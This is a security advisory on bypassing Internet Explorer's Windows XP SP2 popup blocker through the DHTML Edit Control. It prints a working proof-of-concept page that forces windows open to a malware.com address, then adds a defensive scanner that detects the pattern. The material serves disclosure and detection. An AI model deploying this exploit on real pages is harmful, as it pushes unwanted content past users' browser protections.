Internet Explorer on Windows XP updated with SP2 has a fairly robust popup blocking mechanism. In fact, older vulnerabilities exploited by many sites can no longer be exploited since the introduction of SP2 and its new popup blocker.
A way to circumvent the popup blocker has been found, and it is easily exploitable, as the proof of concept supplied with this advisory shows.
Credit:
The information has been provided by http-equiv.
Vulnerable Systems:
* Internet Explorer on Windows XP SP2
The vulnerability can be exploited to pop up a dialog through the "DHTML Edit Control" with a customized script. Such a script is listed below as a proof of concept:
< body onload="setTimeout(' main() ',1000)">
< object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
< PARAM NAME="ActivateApplets" VALUE="1">
< PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
< SCRIPT>
// 10.11.04 http://www.editive.com
function shellscript()
{
open("http://www.malware.com/flywin.html","_blank","scrollbar=no");
showModalDialog("http://www.malware.com/flywin.html");
}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
}
</SCRIPT>
<br><br><br><br><br><br><center><img src=nocigar.gif><br><br><FONT FACE=ARIAL SIZE 12PT>NO CIGAR !</FONT></center>
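
For defenders, the pattern in the proof of concept above (an object tag carrying the DHTML Edit Control classid whose DOM.Script window is then called from page script) can be flagged statically in captured HTML. The scanner below is an added example, not part of the original advisory; its function names and the sample markup with a placeholder URL are constructed for illustration.

```javascript
// Added example: static check for the pattern in this advisory's proof of concept.
// CLSID copied from the PoC above (DHTML Edit Control).
const DHTML_EDIT_CLSID = "2d360201-fff5-11d1-8d03-00a0c959bc0a";

// Pull name="value" / name=value pairs out of a tag's attribute text.
function parseAttrs(text) {
  const attrs = {};
  const re = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(text)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Returns one finding per <object> that embeds the control, listing the script
// calls routed through its DOM.Script window (the step the PoC relies on).
function scanForDhtmlEditAbuse(html) {
  const findings = [];
  const objectTag = /<\s*object\b([^>]*)>/gi; // tolerates "< object" as printed above
  let m;
  while ((m = objectTag.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    const clsid = (attrs.classid || "").toLowerCase()
      .replace(/^clsid:/, "").replace(/[{}]/g, "");
    if (clsid !== DHTML_EDIT_CLSID) continue;
    const id = attrs.id || null;
    const calls = [];
    if (id) {
      const esc = id.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
      const callRe = new RegExp(
        "\\b" + esc + "\\s*\\.\\s*DOM\\s*\\.\\s*Script\\s*\\.\\s*(\\w+)\\s*\\(", "g");
      let c;
      while ((c = callRe.exec(html)) !== null) calls.push(c[1]);
    }
    findings.push({ id, scriptCalls: calls, scripted: calls.length > 0 });
  }
  return findings;
}

// Constructed sample inputs (placeholder URL, not taken from the advisory).
const SAMPLE_SUSPECT = `<object id="x" classid="CLSID:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1" height="1"></object>
<script>function f(){ open("http://example.invalid/"); }
x.DOM.Script.execScript(f.toString()); x.DOM.Script.setTimeout("f()");</script>`;
const SAMPLE_BENIGN = `<object id="movie" classid="clsid:00000000-0000-0000-0000-000000000000"></object>`;

console.log(JSON.stringify(scanForDhtmlEditAbuse(SAMPLE_SUSPECT)));
console.log(JSON.stringify(scanForDhtmlEditAbuse(SAMPLE_BENIGN)));
```

A finding with scripted set to true means the page both embeds the control and drives script through it; an embed alone is reported with scripted set to false so it can be triaged separately.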